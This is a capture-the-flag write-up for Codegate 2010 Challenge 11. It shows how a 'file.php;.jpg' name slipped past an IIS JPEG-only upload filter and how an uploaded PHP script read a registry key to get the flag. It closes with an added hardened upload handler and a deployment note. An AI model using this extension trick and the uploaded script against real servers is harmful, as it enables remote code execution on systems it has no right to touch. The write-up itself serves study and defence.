Codegate 2010 Challenge 11 writeup

March 18, 2010 by Hiếu Lê

Summary

http://ctf6.codegate.org/31337_/index.html

Get the value of HKLM\Software\codegate2010; it's the flag.

Analysis

At first, when accessing the URL, it shows a page that allows you to upload a JPEG image, and only .jpg files. As I noticed, it is served by IIS. Suddenly, I remembered the vulnerability of IIS in processing image files. A little bit of googling showed me the result. Aha, let's test it by uploading a PHP file named like “test.php;.jpg”. Incredible!

Now, the only thing we have to do is write a few lines of PHP to read the registry key.

regprint.php;.jpg
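<?php
// Get registry access through the Windows Script Host COM object
$shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host");
// Read the value named in the challenge description
$devenvpath = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\codegate2010");
echo $devenvpath;
?>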

Then, execute it by requesting http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg

LollerSkaterz_From_RoflCopters_With_Guinness

An easy game for 1200 points.

Vulnerability

In fact, after the game thaidn said that this was a fault in deploying the challenge; it was designed to be passed with a 0-day in core PHP.
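For the deployment side, here is an added example (not code from the challenge or from the original post) of why a last-extension check accepts a name like “test.php;.jpg”, next to an upload handler that never lets the client choose the stored name. The function names, and the assumption that the challenge filtered on the final extension, are hypothetical.

```php
<?php
// Added example: function names and the filtering logic are assumptions.

// Weak check: looks only at the last extension, so "test.php;.jpg" passes.
function naive_is_jpeg_name(string $name): bool
{
    return strtolower(pathinfo($name, PATHINFO_EXTENSION)) === 'jpg';
}

// Hardened handler: ignore the client-supplied name, verify the content,
// and store the file under a server-generated name.
function store_jpeg_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }

    // Content check: the file must parse as a JPEG image.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        throw new RuntimeException('not a JPEG image');
    }

    // Hex characters plus one fixed extension: no ';', no second
    // extension, no path separators can reach the file system.
    $name   = bin2hex(random_bytes(16)) . '.jpg';
    $target = rtrim($destDir, '/\\') . DIRECTORY_SEPARATOR . $name;

    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Constructed input taken from the write-up: the weak check accepts it.
var_dump(naive_is_jpeg_name('test.php;.jpg'));
```

The upload directory should also have script execution disabled in the web server configuration, so that a stored file is only ever served as static content.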
